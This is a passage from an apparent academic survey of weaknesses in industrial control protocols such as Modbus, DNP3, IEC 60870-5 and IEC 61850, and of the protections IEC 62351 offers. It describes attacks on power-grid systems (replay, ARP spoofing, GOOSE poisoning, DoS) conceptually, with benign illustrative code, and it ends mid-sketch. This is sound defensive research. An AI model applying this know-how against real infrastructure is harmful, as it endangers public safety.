As a matter of fact, the conventional security measures devised within the context of ICT and networking technologies become extremely challenging to implement in control systems. Exchanging these legacy parts would either entail high costs due to revenue loss during the transition time, or not be possible at all because of custom builds often working with code written by operators no longer working for the company. What is worse, these legacy control systems were often designed in a time when security concerns were dangerously neglected. Additionally, control systems are used in wide-spread industrial sites, which necessitates the physical intervention of personnel and results in difficulty in implementing key management, certificate revocation and other security measures. Finally, although security measures in wireless systems have improved in the last decade, wireless technologies are still not widely used in control systems due to extremely noisy environments (e.g., power systems) that might perturb the corresponding signal.

This leads to the conclusion that control systems have specific requirements, which have to be considered when devising security strategies. Often, these requirements cause conflicts and contradictions between well-known protection methods and a functional control system. To give an overview, the most important requirements of control systems are listed below:

- Legacy constraint: Often control systems consist of legacy components with low bandwidth, little computational power and/or limited storage space [52]. Some are not even supported any more by their vendors with updates or patches. This is often due to the long life cycle of control system products, which can be up to 30 years. A change of these components will often result in high costs or revenue loss due to downtime, which companies are not willing to accept.
- 24/7 constraint: Control systems which supervise critical infrastructures need to be operational at all times. Even a short downtime can cause huge monetary or reputation damage or even endanger human lives (e.g., blackouts) [53].
- Real-time constraint: In industrial control systems, the devices have to react as quickly as possible to commands given by the operator through a control system. Often, if a critical state is reached, the decision has to be made in a matter of seconds. This means that low latency and efficient use of bandwidth are critical for these systems [53].

IV. ADVERSARY MODEL

An adversary model is a common method to summarize assumptions about the nature, significance and resources of persons and organizations tending to perform malicious activities and cause harm to the system [54]. The adversary model is developed to describe the capabilities of a potential attacker and to indicate the threats and attack scenarios. Nowadays, due to the diversity of possible attacks and the interests of different actors, it is especially important to investigate the threat landscape precisely. This section presents a collaborative overview of threat actors and discusses their features. In general, adversaries, also defined as threat actors, can be classified as outsiders, having no authorized access to telecontrol systems, and insiders, i.e., legal entities with a certain set of permissions in the targeted system. This approach is used, for example, in [55]. According to IEC 62351-1 part 5.2.3, eight classes of potential threat actors can be distinguished. This classification is, however, incomplete until corresponding threat levels are assigned.
Here, a threat level is a qualitative measure of the potential impact which occurs if an adversary completes its attack successfully. Moreover, the standard presents viruses and worms as a separate threat actor. This makes the model incoherent, since viruses and worms need to be considered as tools, not threat actors themselves. Furthermore, depending on the type of virus or worm and the targeted element(s) of the system, different threat levels are required. As a result, this class of threat actors is not considered in this paper. In the following, the threat actors investigated in the analysis (Section V-C) are listed:

- Unskilled and skilled outsiders: Outsiders with various levels of hacking skills are common adversaries which system defenders are facing. Usually these actors have no ideology except the curiosity to break the security of a system. Unskilled outsiders are usually able to detect the reachability of hosts in control networks and use common tools for penetration testing, but do not have any special knowledge regarding CSCPs. Skilled outsiders, in addition, possess enough experience in breaking telecontrol systems and network security. This makes it rational to attach different threat levels to outsiders depending on their skills.
- Industrial espionage: Not only persons but entire organizations may be interested in breaking control network security. Resulting availability problems may lead to customers changing their provider; also, sensitive information can be stolen. Organizations have enough resources to employ highly skilled professionals, but have to work secretly so as not to disclose their illegal activities.
- Trusted insiders: One of the most common threats are malicious insiders that may have low hacking skills, but hold enough information about the system's architecture and maintenance. The potential harm depends on the position and security clearance of the insider. Malicious administrators, as a worst-case scenario, have enough knowledge to ruin security systems as well as the whole critical infrastructure, causing catastrophic damage.
- Terrorist groups: Nowadays, terrorist and hacker groups are becoming some of the most dangerous actors in cyberspace. These organizations aim to perform attacks on critical infrastructures in order to present their ideology and personal beliefs [13]. The potential damage depends on the resources such a group has access to. Several terrorist and hacker groups get support from their nations and interested organizations. Nevertheless, highly skilled professionals are usually employed by terrorist groups or join them on their own.
- National states, foreign intelligence services: According to [13], the most powerful actors in critical infrastructure security are hostile nations and their intelligence services. Having almost unlimited resources, hostile nations can hire skilled professionals to damage critical infrastructures such as power, water and industry to influence the current political situation. These attacks can cause the loss of citizens' lives. Another common motivation is espionage and the collection of information about national infrastructures for future purposes. Moreover, national cyber security services are interested in testing their capabilities to gain access to another nation's resources.
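Before turning to the tabular overview, the following purely illustrative Python sketch shows one way such a qualitative model could be encoded for automated use, e.g., when filtering attack scenarios by attacker capability. The property names mirror the ones listed below for Table V; the concrete values assigned to the two example actors are assumptions made for the sketch, not values taken from the standard or from Table V.

```python
# Illustrative encoding of an adversary model; the example values are
# assumptions for this sketch only.

from dataclasses import dataclass
from enum import Enum

class Level(Enum):
    LOW = 1
    MEDIUM = 2
    HIGH = 3

@dataclass
class ThreatActor:
    name: str
    threat_level: Level
    motivation: str
    resources: Level
    hacking_skills: Level
    typical_attacks: tuple

ACTORS = (
    ThreatActor("unskilled outsider", Level.LOW, "curiosity",
                Level.LOW, Level.LOW, ("device detection", "eavesdropping")),
    ThreatActor("nation state", Level.HIGH, "espionage, sabotage",
                Level.HIGH, Level.HIGH, ("MitM", "DoS/DDoS", "supply chain")),
)

# Example use: list the actors assumed capable of resource-intensive attacks.
print([a.name for a in ACTORS if a.resources is Level.HIGH])
```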
TABLE V. ADVERSARY MODEL

Table V presents an overview of the adversary model described above. It defines a set of major properties for each of the defined adversaries:

- Threat level: A qualitative marker which allows distinguishing different classes of adversaries based on their overall potential impact if an adversary completes its attack successfully.
- Motivation: Summarizes assumptions about possible stimuli.
- Impact: A qualitative marker which describes the potential damage (data, human, or environmental), similar to ISO 31000/IEC 61508 [56].
- Resources: Summarizes assumptions about the computational power available to the adversary.
- Level of hacker skills: Summarizes assumptions regarding the professional knowledge possessed by the adversary.
- Typical attacks: Provides examples of possible security breaches, which are later discussed in Section V.

The set of properties is not exhaustive; more properties can be defined to complete the adversary information, such as the necessity of physical access, the requirement of specific hardware, and the sustainability of the deployed security measures against the malicious activity.

V. POTENTIAL SECURITY BREACHES IN CONTROL SYSTEM COMMUNICATION PROTOCOLS

This section covers attacks related to CSCPs. The origin of the vulnerabilities for most of the protocols is the lack of basic confidentiality, integrity and authentication mechanisms for data communication. Lack of confidentiality and integrity leads to unwanted access to and possible modification of data transmitted over the channel. At the same time, lack of authentication is a reason for the unquestioning acceptance of all commands received by RTUs. Attacks are classified based on the security requirements they violate. For some interaction attacks, such as replay or MitM, several classes are possible.

A. IEC 62351 Standard Overview

The scope of the IEC 62351 standard is to provide power systems with the relevant end-to-end security information for their control operations. For this purpose, the main objective is to propose the development of standards for the security of the communication protocols defined by IEC TC57, especially for the IEC 60870-5, IEC 60870-6 and IEC 61850 series [57]. To this end, the standard is divided into 13 parts:

- Part 1: Introduction to the standard.
- Part 2: Glossary of terms.
- Part 3: Security for profiles including TCP/IP.
- Part 4: Security for profiles including MMS.
- Part 5: Security for profiles including IEC 60870-5.
- Part 6: Security for IEC 61850 profiles.
- Part 7: Security through network and system management.
- Part 8: Role-based access control.
- Part 9: Key management.
- Part 10: Security architecture.
- Part 11: Security for XML files.
- Part 12: Resilience and security for power systems.
- Part 13: Guidelines on security topics to be covered in standards.

B. Methodology

Taking the constraints/challenges of Sections III-C and III-D into account, the three security requirements (i.e., confidentiality, integrity and availability) are satisfied through the combination of security management techniques and technologies. Among several, certificate and key management (e.g., authentication) together with encryption (e.g., AES) are the most prominent countermeasures to the security threats discussed in Section V-C.
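As a concrete illustration of such channel protection, the minimal Python sketch below wraps a Modbus/TCP read request in TLS, in the spirit of the TLS-based profiles of IEC 62351-3 and of the Modbus/TCP Security specification (which, to our understanding, registers TCP port 802 for TLS-protected Modbus). It is a sketch only: the host name, certificate path, unit and register addresses are placeholders, and a real deployment would additionally use mutual (client certificate) authentication and proper error handling.

```python
# Minimal sketch, assuming a Modbus/TCP endpoint reachable behind a
# TLS-terminating server on port 802 and a trusted CA certificate in ca.pem;
# names and paths are placeholders, not a real deployment.

import socket
import ssl
import struct

def read_holding_registers(host: str, unit: int, address: int, count: int) -> bytes:
    ctx = ssl.create_default_context(cafile="ca.pem")   # server authentication
    # Mutual authentication would normally be added here, e.g.:
    # ctx.load_cert_chain("client.pem", "client.key")
    with socket.create_connection((host, 802)) as raw_sock:
        with ctx.wrap_socket(raw_sock, server_hostname=host) as tls_sock:
            # Modbus PDU: function code 0x03 (read holding registers), start, count
            pdu = struct.pack(">BHH", 0x03, address, count)
            # MBAP header: transaction id, protocol id (0), remaining length, unit id
            mbap = struct.pack(">HHHB", 1, 0, len(pdu) + 1, unit)
            tls_sock.sendall(mbap + pdu)
            return tls_sock.recv(260)    # Modbus/TCP frames are small

# Example (placeholder host name):
# response = read_holding_registers("rtu.example.net", unit=1, address=0, count=10)
```

The design point is that the Modbus framing itself stays untouched; confidentiality and server authentication come entirely from the TLS channel, which is exactly why this approach fails on legacy devices that cannot terminate TLS, as noted below.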
It is worthwhile to note that security is an end-to-end requirement of control systems for the sake of ensuring authenticated access to sensitive equipment, authorized access to data, and information on equipment failures. Due to this large spectrum, a one-size-fits-all paradigm is not appropriate, as each asset needs to be secured based on its required security level. To this end, a continuous security process cycle is proposed in the IEC 62351 standard, which consists of the following five steps: (1) security assessment, (2) security policy, (3) security development, (4) security training and (5) security audit. In this paper, we focus on the first step of this cycle for the purpose of our analysis and results. More precisely, the considered methodology consists of assessing assets by considering their security requirements and the probable risks of attack. For this purpose, we carry out the security assessment by studying the protocols without (pre) and with (post) the implementation of the IEC 62351 security standard. The end result of such a methodology is to qualitatively highlight the security improvements of IEC 62351 as well as to emphasize the missing parts of such a standard within an industrial context such as smart grid SCADA systems. The reason for using a qualitative analysis is the difficulty of extracting real and exact numbers from industrial control systems due to confidentiality reasons. It is noteworthy that, regarding the usage of IEC 62351 with the Modbus protocol, its application is theoretically possible (e.g., using Transport Layer Security (TLS) to secure Modbus TCP communication, as sketched above); however, a technical realization may often be hardly achievable due to the resource limitations present in legacy Modbus systems. In the upcoming analysis, the applicability of IEC 62351 to the Modbus protocol is assumed to be possible. For the OPC UA protocol, no application of the IEC 62351 security standard is considered, as OPC UA implements its own security features without relying on IEC 62351. Therefore, in the following, no pre-/post-IEC 62351 analysis is performed for OPC UA.

C. Analysis

1) Confidentiality Violation Attacks:

a) Detection of control system devices: The initial step of all communication-based attacks is the detection of devices in the network. For detecting control system devices, two approaches can be considered: passive and active. A passive approach implies that an interface is set up in promiscuous mode to subsequently monitor traffic. During active detection, packets are sent out from an attacker's device in order to obtain responses from control systems. The Application Protocol Data Units (APDUs) sent during active detection carry specific control commands which force target devices to answer with a confirmation.

Measures defined by IEC 62351: There are no comprehensive countermeasures defined in the standard. General security recommendations are discussed in Section V-D. In Table VI, the results for the device detection attack analysis are summarized.

TABLE VI. VULNERABILITY ANALYSIS RESULTS FOR DEVICE DETECTION ATTACK

b) Eavesdropping: Eavesdropping is an example of a SCADA communication confidentiality violation. Because of the lack of inbuilt confidentiality protection, these attacks are easy to perform.
Eavesdropping represents a common activity of outsiders with low hacking skills. By eavesdropping on the communications of control system devices, attackers can learn control commands while simply listening to the traffic, and log message exchanges between different nodes. As there usually are no encryption mechanisms specified for CSCPs, using an eavesdropping attack, adversaries can obtain a full image of the current system state. Captured traffic can be used later for more sophisticated attacks, such as replay and MitM.

Real case scenarios:

- Modbus, IEC 60870-5-101, IEC 60870-5-104: One of the most suitable methods to attack Modbus and IEC 60870-5-based protocols is port mirroring, as described in [26]. To capture packets, an attacker has to configure a span port on network devices, so that all targeted traffic is retransmitted to the attacker's system. There are several ways a span port can be configured, such as gaining administrative privileges on network devices for outsiders, or direct access for insiders. Attackers require some experience with serial protocol message exchanges. Capturing of messages is a confidentiality violation and can lead to active attacks.
- TASE.2: By design, the TASE.2 protocol does not include any inbuilt security measures. The confidentiality of information transmitted over the TASE.2 connection is expected to be implemented by the underlying protocols.
- DNP3: For the scenario of DNP3, this type of attack was analyzed within a testbed setup by eavesdropping on the network traffic between a slave IED and a master gateway through ARP cache poisoning [33]. A side effect of the eavesdropping was the successful manipulation of the Media Access Control (MAC) addresses by the attacker, who altered the destination MAC address of the frame to the attacker's machine address. Whereas the forwarding of messages to the attacker's machine does not have any further direct security implications except for a confidentiality violation, it induced an increased delay in the communication, which in certain cases could be deemed dangerous, especially if fast reaction times are required.
- IEC 61850: Using an ARP spoofing approach, an adversary can launch a MitM attack on the MMS communications of IEC 61850. Based on this MitM attack, several kinds of attacks can further be launched, among others eavesdropping. An example scenario would be an adversary that wants to gather additional information by eavesdropping on the hijacked or tapped communication before carrying out further attacks. Such a scenario is described in [41].

Measures defined by IEC 62351: The encryption applied by TLS through IEC 62351 is an effective means to prohibit adversaries from accessing information through eavesdropping. In Table VII, the results for the eavesdropping attack analysis are summarized.

TABLE VII. VULNERABILITY ANALYSIS RESULTS FOR EAVESDROPPING ATTACK
TABLE VIII. VULNERABILITY ANALYSIS RESULTS FOR CAM TABLE OVERFLOW ATTACK

c) Content addressable memory (CAM) table overflow attack: One of the possible confidentiality violation attacks which gains the possibility to eavesdrop on CSCPs with a TCP/IP profile is the CAM table overflow attack [58]. Data link layer switching devices process Ethernet frames based on MAC or hardware addresses. A CAM table maps the switch ports to the destination MAC addresses. As a result, frames are sent to the intended address on an individual basis. The toy model below illustrates this mechanism and what happens when the table is exhausted.
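The following Python toy model is deliberately simplified (real switches additionally age out entries and differ in the details of their learning logic); it only captures the forwarding decision just described and shows why exhausting the table degrades the switch to hub-like flooding, which is the effect the attack described next relies on.

```python
# Toy model of CAM-table-based forwarding: once the table is full, new
# addresses can no longer be learned and frames for unknown destinations
# are flooded to every port instead of being forwarded selectively.

class ToySwitch:
    def __init__(self, ports, capacity):
        self.ports = list(ports)
        self.capacity = capacity
        self.cam = {}                      # MAC address -> port

    def learn(self, src_mac, port):
        if src_mac in self.cam or len(self.cam) < self.capacity:
            self.cam[src_mac] = port       # normal address learning
        # otherwise the new entry is dropped: the table is exhausted

    def forward(self, dst_mac):
        if dst_mac in self.cam:
            return [self.cam[dst_mac]]     # unicast to the known port
        return self.ports                  # unknown destination: flood

switch = ToySwitch(ports=[1, 2, 3, 4], capacity=3)
for i in range(10):                        # bogus addresses fill the table
    switch.learn(f"de:ad:be:ef:00:{i:02x}", 4)
switch.learn("aa:aa:aa:aa:aa:02", 2)       # late legitimate device: no room left
print(switch.forward("aa:aa:aa:aa:aa:02")) # -> [1, 2, 3, 4]: flooded to all ports
```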
If an attacker triggers a CAM table overflow, it forces a switching device to act as a hub, i.e., to broadcast Ethernet frames to all ports. Attackers can flood the CAM table with new MAC-port entries in order to fill up the device's memory. As a result, the target device is not able to function as intended and begins broadcasting Ethernet frames to all available ports. Having access to one of the ports, e.g., one used for external connections, attackers are able to listen to and capture the traffic that flows through the switching device.

Real case scenarios: This attack exploits the functionality of Ethernet switches. Since there are several CSCPs in substation networks that use Ethernet switches to connect IEDs, all IEC substations are vulnerable to these attacks. Among these protocols are, among others, Modbus, DNP3, IEC 60870-5-104, and IEC 61850. Experiments with IEC 61850 are reported in [59].

Measures defined by IEC 62351: There are no comprehensive countermeasures defined in the standard. General security recommendations are discussed in Section V-D. In Table VIII, the results for the CAM table overflow attack analysis are summarized.

TABLE IX. VULNERABILITY ANALYSIS RESULTS FOR MASQUERADE ATTACK

d) Masquerade attack: An ARP spoofing attack is an example of masquerading [44], [58]. This attack exploits the lack of verification and authentication support in CSCPs. ARP is a stateless protocol used to map an IP address to a physical machine address. The ARP cache is updated with new information each time a host receives a reply, whether a request was sent or not. ARP spoofing is a way to modify a target host's ARP cache with a forged entry, allowing attackers to masquerade as a legitimate host and get access to traffic for further actions. Often ARP spoofing is used to launch further subsequent attacks, such as MitM, session hijacking, or DoS.

Real case scenarios:

- Modbus, IEC 60870-5-101, IEC 60870-5-104: Examples of the successful utilization of ARP spoofing as a step towards a MitM attack are presented in [26] and [27].
- DNP3, DNPSec: An eavesdropping attack was realized by Rodofile et al. [33] within the context of DNP3, where the attacker intercepted the communication as a result of ARP cache spoofing. Due to the ineffective security measures in DNPSec, a similar attack can be realized against it.
- IEC 61850: As previously discussed, using ARP spoofing attacks, a masquerade attack is possible on IEC 61850, which is presented in [41].

Measures defined by IEC 62351: There are no comprehensive measures defined in the standard. General security recommendations are presented in Section V-D. In Table IX, the results for the masquerade attack analysis are summarized.

e) Credential theft: Besides operator commands and system responses, typical data exchanges in critical infrastructures such as the smart grid also include customer names, identification numbers, schedule information and location data. These data are sensitive since they may carry credentials that allow persons or organizations to gain access to the system. Credential-based attacks include several phases. In the first phase, an attacker abuses the low confidentiality protection of CSCPs to obtain sensitive information. This information can subsequently be used by an attacker to authenticate as a legal entity and compromise the whole system.
As a result, these attacks can further lead to integrity and availability violations.

Real case scenarios:

- Modbus, Modbus-F2009, TASE.2, DNP3, DNPSec, DNP3 SA, IEC 60870-5-101, IEC 60870-5-104: The lack of encryption in CSCPs makes it easy for attackers to obtain information by simple eavesdropping and use it for further attacks such as user-to-root. A user-to-root attack allows gaining superuser privileges while starting as a normal user. Having superuser privileges, a malicious outsider with a low clearance level can rise to insider level and cause severe damage. The scope of damage to the infrastructure depends on the access rights assigned to the stolen credentials.
- IEC 61850: Besides the lack of encryption in IEC 61850 as in the other CSCPs, password cracking attacks can be performed on application-level services such as File Transfer Protocol (FTP), Hypertext Transfer Protocol (HTTP) and Telnet running on IEDs, as presented in [59] and [60].

Measures defined by IEC 62351: Apart from basic authentication methods, IEC 62351-8 presents a Role-Based Access Control (RBAC) model for power systems. This model ensures the security policy implementation by defining specific roles for users with different levels of trust. Once introduced in a system, an access model restricts the transmission of credentials over a network. However, the implementation of a sophisticated access model for each system is a time- and money-consuming process, preceded by a laborious and difficult design phase. An example of static and dynamic role identification is discussed in [61]; furthermore, the authors emphasize that IEC 62351 does not provide means to enforce authorization rights in detail. In Table X, the results for the credential theft attack analysis are summarized.

TABLE X. VULNERABILITY ANALYSIS RESULTS FOR CREDENTIAL THEFT ATTACK

2) Integrity Violation Attacks:

a) Replay, alteration and spoofing attacks: Captured messages can be used for replay attacks, by which an attacker retransmits obtained messages with modifications or a delay in order to trick the target device(s). By retransmitting messages without modification, an attacker is able to trigger pull requests from field devices and obtain enough information regarding their state and current measurement data. Replay attacks with modification of data (insertion, deletion, alteration) are even more dangerous, because they lead to integrity and availability violations. Modified messages can contain wrong data and commands. Furthermore, an attacker can drop initial packets in order to craft a new packet to be sent instead. By injecting his/her own commands or data into a control system, an attacker can disturb normal system processes and provoke emergencies. As an example, an attacker can gain access to smart meters and inject control signals into the system. The aim of this replay attack may be to shut down the power supply to a certain area.

The lack of data link integrity in CSCPs additionally leads to an absence of non-repudiation and, as a result, to repudiation attacks. The system is unable to properly track users' activities, which allows potentially malicious actions to be taken while forging the origin of these actions. The goal of such attacks is usually to impersonate a legitimate user and exploit this impersonation to execute malicious actions on a system.
Its usage can be extended to general data manipulation in the name of others. If such an attack is successful, the logging information cannot be used for forensic analysis later and needs to be considered invalid or misleading.

For example, an attacker can modify information transmitted from RTUs to the administration subsystem in order to create a misleading perception of the current state of the field devices. Furthermore, it is possible to impersonate commands and messages in order to make administrators think that malicious activities in the system originated from random device failures instead of a third party.

Real case scenarios:

- Modbus: The lack of authentication mechanisms in combination with no integrity checks makes the Modbus protocol highly susceptible to replay, alteration and spoofing attacks. It is possible for any attacker to impersonate a legitimate Modbus master, enabling the reuse of Modbus messages sent to or from slave devices. Due to the lack of integrity checks, the messages cannot only be resent, but also altered in any way required by an attacker. Similarly, messages may be spoofed, e.g., by impersonating a slave and sending arbitrary messages to its master.
- OPC UA: Even for well-secured protocols such as OPC UA, alteration attacks take place if the security means are implemented in the wrong way. Thus, failing to deactivate the security mode None can lead to a protocol downgrade attack and subsequently to the interception and alteration of messages.
- TASE.2: The absence of integrity measures in TASE.2 leads to easily realizable alteration attacks. Attackers are able to access the data in transmission and insert false information, which will be perceived by the control center as valid.
- DNP3: An address alteration attack can be achieved targeting DNP3. To this end, the attacker's objective is to intercept DNP3 frames and change their corresponding DNP3 destination addresses. Note that a DNP3 address is different from a MAC address. Changing the DNP3 destination address of a frame causes other devices to reply, or the intended device fails to receive the message. It was shown in [33] that such an attack has some practical limitations if the intention is to forward the frame from one device to another. More precisely, in order to be able to forward the frame to another device, a TCP connection needs to be established prior to the attack. As a matter of fact, this attack makes sense if more than one master is configured on the slave device.
- IEC 60870-5-101: Integrity violation attacks are easy to perform in IEC 60870-5-101 environments. The reason for such simplicity is the fact that the IEC 60870-5-101 protocol lacks data integrity features, such as strong checksum algorithms. As depicted in Fig. 11, the checksum is implemented as a one-byte field. As a result, one of the weakest links in this protocol is its one-byte checksum, which is not sufficient to provide message integrity. Overflowing the checksum byte is a trivial operation, and an attacker can alter data values and the checksum field to perform undetectable modifications.
- IEC 60870-5-104: As shown in a simulated environment in [26], replay attacks on IEC 60870-5-104 can easily be performed. Packets are captured from the span port of the switch and replayed by using Kali Linux scripts.
This experiment shows the simplicity of this attack and discusses the problem of its detectability in industrial networks, where the presence of stateful Intrusion Detection Systems (IDSs) for low-level devices is unlikely.

- IEC 61850: Cai et al. [57] illustrate an attack on IEC 61850 based on the fact that SV, GOOSE, and MMS packets in most current smart substation networks are transmitted in plain text via TCP/IP and the Ethernet protocol. The first attack is a GOOSE- and SV-based alteration attack which can compromise IEDs [39]. In [44], this attack is extended further by implementing it in a malware that can capture, alter and re-inject GOOSE messages into the network.

Measures defined by IEC 62351: Apart from designing a secure network environment, application-level IEC 62351 can be used to mitigate this attack. The standard provides challenge-response mechanisms based on HMAC with a pre-shared key [62]. These measures aim to ensure authentication and integrity for the IEC 60870-5-101/IEC 60870-5-104 protocols. In the case of IEC 61850, depending on the traffic sent via IEC 61850 (GOOSE, SV, or MMS) and the respective required timing, different security measures are recommended by IEC 62351. For MMS, messages are expected to make use of TLS; therefore authentication, confidentiality as well as integrity can be achieved. In contrast, for GOOSE or SV, the extended Protocol Data Unit (PDU) containing a signature is used to guarantee both authenticity and integrity. Also, the standard suggests the usage of RSA signatures for the authenticity and integrity of extended PDUs, which makes it unsuitable for time-critical applications (traffic allowing a 4 ms maximum response time), as RSA signatures are relatively expensive in terms of the computational power required. Here, other techniques requiring a lower computational complexity, such as HMACs, would need to suffice [63]. Both measures, if implemented correctly, can protect against replay, alteration and spoofing attacks. However, several attacks were discovered even after the introduction of IEC 62351.

The first is a replay attack on the GOOSE protocol, where previously sent legitimate messages can be injected again after the stNum value (32 bit) is reset to zero [40], [64]. According to the validation scheme employed in GOOSE, the receiver accepts a message that was recorded by an attacker shortly before the stNum reset and replayed shortly after. Besides this replay attack, a DoS can be achieved using the same exploit, because all legitimate subsequent messages after the injected one would be dropped until their respective stNum values exceed that of the replayed message.

Second, MMS messages are not entirely secured against integrity violations [65]. The security of MMS messages is described in IEC 62351-4 and offers two profiles targeting transport (T-Profile) and application security (A-Profile). The T-Profile covers the protection of information on the TCP/IP level using TLS. The A-Profile defines security measures to be taken on the application layer. However, the authentication used in the A-Profile does not provide application-layer message integrity, which makes the usage of the T-Profile mandatory to achieve integrity protection.
Combining the A-Profile and T-Profile therefore provides authentication, integrity protection and confidentiality on the transport level and authentication on the application level. This approach works fine, but only if the transport connection spans the same entities as the application connection. As soon as there is a difference in transport and application connection hops, security problems arise. An example may be a scenario in which a proxy is used. Here, the T-Profile is terminated by the proxy, whereas the application connection may be established end-to-end, directly with the actual entity to be reached. Since IEC 62351-4 does not provide application-level integrity, no end-to-end application-level security is provided.

Third, a security loophole exists enabling replay attacks on the SV protocol, where a previously sent message can be replayed to a different receiver. This attack requires that two or more SV clients are subscribed to the same data set of a logical node. For each communication relationship, a separate control block with different parameter values exists. Specifically of interest for this attack is that the values for the smpRate (number of samples sent per second) may differ. If different subscribers are receiving messages at different rates, their smpCnt values diverge. This attack works by replaying a message originally sent to a subscriber with a higher smpRate (and therefore a higher smpCnt value) to a subscriber with a lower smpRate (and therefore a lower smpCnt value). In Table XI, the results for the replay, alteration and spoofing attack analysis are summarized.

TABLE XI. VULNERABILITY ANALYSIS RESULTS FOR REPLAY, ALTERATION AND SPOOFING ATTACK

b) Man-in-the-middle: A MitM attack is a form of attack where the communication between two users is either monitored or even modified by an unauthorized third party. Generally, the attacker first actively eavesdrops on a communication by intercepting a public key message exchange and retransmits this message while replacing the requested key with his/her own. This process is transparent to both original parties, i.e., they appear to communicate normally. Neither the sender nor the receiver recognizes that the communication partner is an attacker trying to access or modify the message before retransmitting it to the originally intended destination.

Real case scenarios:

- Modbus: The complete lack of integrity checks in the Modbus protocol enables any attacker who has access to the control system network to either eavesdrop on messages or even modify legitimate messages, as well as fabricate new messages and send them to slave devices [66].
- DNP3: In [34], attack scenarios based on packet fabrication and modification were studied by analyzing the function codes present in the data link and application layers, respectively. A MitM attack use case was considered by modifying the function codes for three different cases: request of the Master Terminal Unit (MTU), response of the RTU, and solicited MTU to unsolicited RTU response. It was shown that by fabricating or modifying erroneous data function codes (e.g., read, select, operate) of a DNP3 request or response, serious impacts on the control system can be achieved.
- IEC 60870-5-101, IEC 60870-5-104: Maynard et al. discuss MitM for IEC 60870-5-104 in the power grid environment of LINZ STROM GmbH in [26]. The attack includes the capturing of packets and further packet replacement. In order to force victim devices to accept crafted packets, a setup was created that was able to modify the checksum field. Yang et al. [27] present MitM attacks on IEC 60870-5-104 based on ARP cache poisoning.
- IEC 61850: An attacker can use several layer-2 techniques to realize a MitM network attack [40]. An example is ARP cache poisoning, which was already described before. After successful ARP poisoning, any traffic meant for the victim's IP address is sent to the attacker instead. There are several types of attacks that the attacker can mount on top of the MitM attack, namely eavesdropping, alteration, injection, and DoS attacks, which are further described in this listing.

Measures defined by IEC 62351: IEC 62351-5 provides measures to ensure authentication and encryption, i.e., HMAC with a pre-shared key and different encryption recommendations. These recommendations can generally not be rated as strong enough [62], but still provide a sufficient level of protection against adversaries with low threat levels. However, the protection is not high enough to withstand high threat level adversaries. In Table XII, the results for the Man-in-the-Middle attack analysis are summarized.

TABLE XII. VULNERABILITY ANALYSIS RESULTS FOR MAN-IN-THE-MIDDLE ATTACK

3) Availability Violation Attacks:

a) DoS/distributed denial of service (DDoS): DoS attacks have the purpose of causing damage by drastically limiting, or even denying, access to specific resources, thus making them unusable to their intended users [67]. These attacks usually cause detrimental effects on the availability of sensitive infrastructure. The most common scenario for CSCPs is as follows: a number of active processes running on the attacker's machine or on compromised system devices flood the communication channel with traffic targeting one or several end nodes. As a result, the target node is slowed down and cannot guarantee further operation. Also, a loss of packets sent by other nodes is a common side effect of such an attack. The scope of damage depends mainly on the attacker's resources. In the case of a DDoS attack, meaning the attacker(s) use a large number of traffic generators, the whole ICS cannot satisfy its real-time constraints anymore. With a wide range of dedicated DoS software available, attackers can easily produce fake Modbus or IEC 60870 packets not serving a valid purpose and flood the network links with them.

Real case scenarios:

- Modbus: Modbus lacks broadcast suppression, which leads to the possibility of sending messages to all connected devices of a control network. This in turn offers an attacker an effective means to create a DoS condition by flooding messages received by all serially connected devices [66].
- TASE.2: The availability of TASE.2 cannot be guaranteed in modern wide area networks, since the protocol completely relies on lower-level communication protocols. The way the TASE.2 protocol stack is organized directly influences its security. Furthermore, interoperability problems may arise due to the different, vendor-specific implementations, which may influence stable operation. In [68], potential attacks impacting availability based on traffic pattern analysis are discussed. The monitoring of traffic rates can pinpoint moments when systems are facing critical situations. The destruction of a communication channel at this point in time will therefore have a major detrimental impact. This attack is possible even if the TASE.2 traffic is encrypted.
- DNP3: Based on [33], DoS attacks were created by modifying the length field of a DNP3 payload, which also necessitated the recalculation of the Cyclic Redundancy Check (CRC) field, sent from slave IEDs to the master device. As a side effect of this attack, the master device rejects the corresponding frame and consequently the required physical mechanism fails.
- IEC 60870-5-101, IEC 60870-5-104: SYN flooding is a generic example of a DoS attack on CSCPs with TCP/IP profiles, such as IEC 60870-5-104 or Modbus. It uses resources of the TCP stack to overflow a server by sending an unbounded number of SYN packets and ignoring the SYN ACKs returned by the server. As a result, the server exhausts its resources waiting for the anticipated ACK that is expected to arrive from a legitimate client. Using a sufficient number of SYN packets forces the target server to refuse any further legitimate connections, since the number of concurrently opened TCP connections is limited. This event is considered a DoS and leads to an availability violation. IP fragmentation attacks are another common form of DoS attack on CSCPs based on TCP/IP. In this scenario, an attacker overbears the communication channels by abusing the datagram fragmentation mechanisms.
- IEC 61850: There are several types of DoS attacks that can be launched against an IEC 61850 network. A trivial DoS attack that exploits common services on IEDs is shown in [59]. As an example, it is assumed there are two services running on an IED (the first service is FTP on port 21, the second is Telnet on port 23). A DoS attack is then executed by opening multiple sessions on one of the services and keeping them idle. SYN flooding and buffer overflow attacks are two other types of DoS attacks that have been simulated and tested on IEC 61850 substation networks in [69]. SYN flood attacks are possible because some IEDs run services such as FTP, HTTP and Telnet for management purposes [69]. Buffer overflow attacks are done by overrunning buffer boundaries, leading to the memory space being overwritten while writing data to buffers. This attack is executed by transmitting malicious code into IEDs, which is possible due to both the vulnerability of IEDs and the unavailability of security measures for IEDs to detect malicious code [69]. Another DoS attack can be realized by sending a large number of GOOSE or SV messages to an IED so that it becomes overwhelmed and no longer able to respond to legitimate requests [39]. Moreover, a DoS can be realized by performing a GOOSE poisoning attack as proposed in [43]. The goal of the attack is to get the subscriber to accept GOOSE messages with a higher sequence number than the ones sent by the publisher. As a result, all GOOSE messages from the publisher will be considered outdated by the subscribers, and the subscribers will only accept and process the GOOSE messages from the attacker. Three variants of GOOSE poisoning attacks are proposed in [43]: the high status number attack, the high rate flooding attack, and the semantic attack (a heuristic detection sketch for such counter anomalies is given at the end of this subsection).

Measures defined by IEC 62351: In [70], it is mentioned that IEC 62351 does not sufficiently cover DoS/DDoS attacks and that they should be guarded against through implementation-specific measures. In Table XIII, the results for the DoS/DDoS attack analysis are summarized.

TABLE XIII. VULNERABILITY ANALYSIS RESULTS FOR DOS/DDOS ATTACK
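The stNum-related replay and poisoning issues described above lend themselves to a simple stateful plausibility check that a monitoring device could apply per publisher and control block. The Python sketch below is a heuristic illustration only: it is not a mechanism defined by IEC 61850 or IEC 62351, the tolerance value is an assumption, and by itself it cannot distinguish a legitimate publisher restart or counter rollover from an injected reset.

```python
# Heuristic sketch of a stateful GOOSE monitor that flags suspicious
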